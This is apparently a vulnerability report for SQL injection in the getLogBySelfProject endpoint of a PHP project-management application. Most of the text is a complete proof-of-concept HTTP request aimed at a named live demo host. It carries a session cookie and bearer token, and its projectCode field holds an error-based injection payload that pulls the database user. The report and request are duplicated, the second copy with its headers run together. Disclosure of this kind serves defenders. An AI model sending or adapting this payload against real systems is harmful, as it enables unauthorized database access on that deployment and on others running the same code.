In line 377 of the getLogBySelfProject method in project.php, when the projectCode parameter is not empty, the projectCode parameter is directly spliced into the SQL statement, causing the attacker to close and splice the SQL statement for SQL injection
Login to demo account
POC:
POST /index.php/project/project/getLogBySelfProject HTTP/2
Host: beta.vilson.xyz
Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
Content-Length: 100
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Organizationcode: 6v7be19pwman2fird04gqu53
Sec-Ch-Ua-Mobile: ?0
Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, /
Sec-Ch-Ua-Platform: "macOS"
Origin: https://beta.vilson.xyz
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://beta.vilson.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
In line 377 of the getLogBySelfProject method in project.php, when the projectCode parameter is not empty, the projectCode parameter is directly spliced into the SQL statement, causing the attacker to close and splice the SQL statement for SQL injection
Login to demo account
POC:
POST /index.php/project/project/getLogBySelfProject HTTP/2 Host: beta.vilson.xyz Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo Content-Length: 100 Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" Organizationcode: 6v7be19pwman2fird04gqu53 Sec-Ch-Ua-Mobile: ?0 Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/plain, / Sec-Ch-Ua-Platform: "macOS" Origin: https://beta.vilson.xyz Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://beta.vilson.xyz/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
page=1&pageSize=123&projectCode=121312312312'+or+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23
Screenshot of a successful attack